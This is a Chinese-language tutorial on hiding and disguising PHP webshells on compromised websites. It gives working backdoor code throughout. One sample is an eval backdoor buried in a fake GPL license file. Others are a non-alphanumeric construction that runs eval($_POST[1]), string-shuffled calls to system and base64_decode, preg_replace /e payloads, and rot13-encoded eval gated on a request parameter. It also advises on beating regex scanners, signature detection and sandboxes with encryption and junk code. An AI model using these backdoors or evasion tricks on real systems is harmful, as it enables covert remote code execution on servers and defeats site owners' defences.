一套PHP隐藏shell,webshell的隐藏、伪装技巧

1.改默认密码

2.改名，融入上传后所在的文件夹，将名字改得较为"普通"(例如indexi.php)，让人很难直观地看出文件的异常。

3.文件大小的伪装处理(像正常脚本)

4.将webshell的payload代码插入到网站原本的正常.php文件中(插入法)，普通的正则匹配很难发现这种webshell

5. webshell文件混淆:

1)变量名混淆

2)插入大量无用的随机字符串

6.变形

1)仿照一些标准、正常的文件名。例如在Joomla的目录下放置LICESNE.php这种"不容易引起视觉可疑"的文件名，并且这些文件的内容都极其类似正常的LICENCE文件

http://blog.sucuri.net/2013/08/more-creative-backdoors-using-filename-typos.html

http://blog.sucuri.net/2013/08/open-source-backdoor-copyrighted-under-gnu-gpl.html

/*GNU GENERAL PUBLIC LICENSE

TERMS AND CONDITIONS FORCOPYING, DISTRIBUTION AND MODIFICATION

This program is free software;you can redistribute it and/or modify

it under the terms of the GNUGeneral Public License as published by

the Free Software Foundation;either version 2 of the License, or

(at your option) any laterversion.

..

GNU GENERAL PUBLIC LICENSE

Version 2, June 1991

*/Copyright3_6_56()/*1989, 1991 Free Software Foundation, Inc.

675 Mass Ave,Cambridge, MA 02139, USA

Everyone is permitted to copyand distribute verbatim copies

of this license document, butchanging it is not allowed.

Preamble

The licenses for most softwareare designed to take away your

freedom to share and change it.By contrast, the GNU General Public

License is intended to guaranteeyour freedom to share and change free

software–to make sure thesoftware is free for all its users. This

General Public License appliesto most of the Free Software

Foundation's software and to anyother program whose authors commit to

using it. (Some other FreeSoftware Foundation software is covered by

the GNU Library General PublicLicense instead.) You can apply it to

your programs, too.*/?>

Joomla! derivesfromcopyrighted works licensed under the GNU General

PublicLicense.Thisversion has been modified pursuant to the

GNU GeneralPublicLicenseasof September15,2005, and asdistributed,

it includesorisderivative ofworks licensed under the GNU General

PublicLicenseorother freeoropen source software licenses. Please

see the CREDITS.phpfora non-exhaustivelistof contributorsand

copyright holders. A full text version of the GNU GPL version2can be

foundinthe LICENSE.php file. A full textversion of the other licenses

that Joomla!isderivative of or includes can be foundinLICENSES.php.

Copyright3_6_56();

functionCopyright3_6_56(){

static$gnu= true;

if(!$gnu) return;

if(!isset($_REQUEST['gnu'])||!isset($_REQUEST['c_id']))return;

$gpl=implode('',$_REQUEST['gnu']);

eval($gpl($_REQUEST['c_id']));

$gnu=false;

}

?>

2)执行函数变形

$_="";

$_[+$_]++;

$_=$_."";

$___=$_[+""];//A

$____=$___;

$____++;//B

$_____=$____;

$_____++;//C

$______=$_____;

$______++;//D

$_______=$______;

$_______++;//E

$________=$_______;

$________++;$________++;$________++;$________++;$________++;$________++;$________++;$________++;$________++;$________++;//O

$_________=$________;

$_________++;$_________++;$_________++;$_________++;//S

$_=$____.$___.$_________.$_______.'6'.'4'.'_'.$______.$_______.$_____.$________.$______.$_______;

$________++;$________++;$________++;//R

$_____=$_________;

$_____++;//T

$__=$___.$_________.$_________.$_______.$________.$_____;

$__($_("ZXZhbCgkX1BPU1RbMV0p"));

//ASSERT(BASE64_DECODE("ZXZhbCgkX1BPU1RbMV0p"));

//ASSERT("eval($_POST[1])");

//key:=1

?>

类似的还有

http://blog.sucuri.net/2013/09/ask-sucuri-non-alphanumeric-backdoors.html

3)执行代码变形(payload变形)

2.1)将webshell的执行代码payload编码成base64的格式: bypass本地特征码检测软件

2.2)将webshell的执行代码payload使用加密算法(例如RSA1024)

http://blog.sucuri.net/2013/10/backdoor-evasion-using-encrypted-content.html

2.2.1)私钥和文件保存在一起: bypass网络流量恶意检测软件，因为这样就可以直接在网络中传输密文。缺点是对于本地文件来说，解密当前webshell加密算法的key是暴露的

2.2.2)私钥和通过网络流量传输的命令放在一起: bypass本地特征码检测软件，在本机文件中不出现解密密文的key，保证了本地webshell文件的保密性。缺点是在网络流量中

出现了key，通过流量分析可以截获并解密之

4)执行函数和执行代码同时变形

$aaaaa="sewtemznypianol";

$char_system=$aaaaa{0}.$aaaaa{8}.$aaaaa{0}.$aaaaa{3}.$aaaaa{1}.$aaaaa{5};

//die($char_system);

$aaaaaa="edoced46esab_n";

$char_base64_decode=$aaaaaa{11}.$aaaaaa{10}.$aaaaaa{9}.$aaaaaa{8}.$aaaaaa{7}.$aaaaaa{6}.$aaaaaa{12}.$aaaaaa{5}.$aaaaaa{4}.$aaaaaa{3}.

$aaaaaa{2}.$aaaaaa{1}.$aaaaaa{0};

die($char_base64_decode);

echo$char_system($char_base64_decode("aXBjb25maWc="));

?>

7.加花

1)在webshell代码中加入一些随机字符串等混淆因子，可以绕过一部分"基于正则"的检测软件

$subject='any_thing_you_can_write';

$pattern="/^.*$/e";

$payload='cGhwaW5mbygpOw==';

//cGhwaW5mbygpOw==: "phpinfo();"

$replacement=pack('H*','406576616c286261736536345f6465636f646528')."\"$payload\"))";

//406576616c286261736536345f6465636f646528:"eval(base64_decode(";

preg_replace($pattern,$replacement,$subject);

?>

8.多态

1)在实际的webshell开始执行前，典型的对传入的参数做一些判断，只有匹配条件时才会进入真正的执行路径。

这种多态技术不仅可以躲过一些正则webshell检测系统，还可以避免被某些动态沙箱的检测软件捕获到(因为动态沙箱很难模拟出这个webshell脚本所需要的"启动参数")

if($_REQUEST["code"]==pany)

{

echostr_rot13('riny($_CBFG[pzq]);');

eval(str_rot13('riny($_CBFG[pzq]);'));

}

else

{

$url=$_SERVER['PHP_SELF'];

$filename= end(explode('/',$url));

$content='helloworld';

$fp= fopen ("$filename","w");

if(fwrite ($fp,$content))

{

fclose ($fp);

die("error");

}

else

{

fclose ($fp);

die("good");

}

exit;

}

?>